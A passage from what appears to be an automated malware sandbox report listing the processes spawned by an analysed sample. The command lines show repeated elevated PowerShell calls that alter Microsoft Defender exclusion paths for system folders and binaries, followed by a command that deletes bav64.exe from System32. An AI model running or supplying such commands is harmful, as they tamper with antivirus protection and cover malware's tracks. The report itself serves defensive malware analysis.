                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:98
                                                                                                                                                                                                Start time:04:47:04
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:99
                                                                                                                                                                                                Start time:04:47:07
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:100
                                                                                                                                                                                                Start time:04:47:07
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:101
                                                                                                                                                                                                Start time:04:47:07
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:102
                                                                                                                                                                                                Start time:04:47:10
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:103
                                                                                                                                                                                                Start time:04:47:10
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:104
                                                                                                                                                                                                Start time:04:47:10
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:105
                                                                                                                                                                                                Start time:04:47:12
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:106
                                                                                                                                                                                                Start time:04:47:12
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:107
                                                                                                                                                                                                Start time:04:47:12
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:108
                                                                                                                                                                                                Start time:04:47:15
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:109
                                                                                                                                                                                                Start time:04:47:15
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:110
                                                                                                                                                                                                Start time:04:47:15
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:111
                                                                                                                                                                                                Start time:04:47:17
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:112
                                                                                                                                                                                                Start time:04:47:17
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:113
                                                                                                                                                                                                Start time:04:47:17
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:114
                                                                                                                                                                                                Start time:04:47:20
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:115
                                                                                                                                                                                                Start time:04:47:20
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:116
                                                                                                                                                                                                Start time:04:47:20
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:117
                                                                                                                                                                                                Start time:04:47:22
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:118
                                                                                                                                                                                                Start time:04:47:22
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:119
                                                                                                                                                                                                Start time:04:47:22
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:120
                                                                                                                                                                                                Start time:04:47:24
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:121
                                                                                                                                                                                                Start time:04:47:24
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:122
                                                                                                                                                                                                Start time:04:47:24
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:123
                                                                                                                                                                                                Start time:04:47:27
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:124
                                                                                                                                                                                                Start time:04:47:27
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:125
                                                                                                                                                                                                Start time:04:47:27
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:126
                                                                                                                                                                                                Start time:04:47:29
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:127
                                                                                                                                                                                                Start time:04:47:29
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:128
                                                                                                                                                                                                Start time:04:47:29
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:129
                                                                                                                                                                                                Start time:04:47:31
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:130
                                                                                                                                                                                                Start time:04:47:31
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:131
                                                                                                                                                                                                Start time:04:47:31
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:132
                                                                                                                                                                                                Start time:04:47:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:133
                                                                                                                                                                                                Start time:04:47:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:134
                                                                                                                                                                                                Start time:04:47:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:135
                                                                                                                                                                                                Start time:04:47:35
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Windows\System32\bav64.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:136
                                                                                                                                                                                                Start time:04:47:35
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
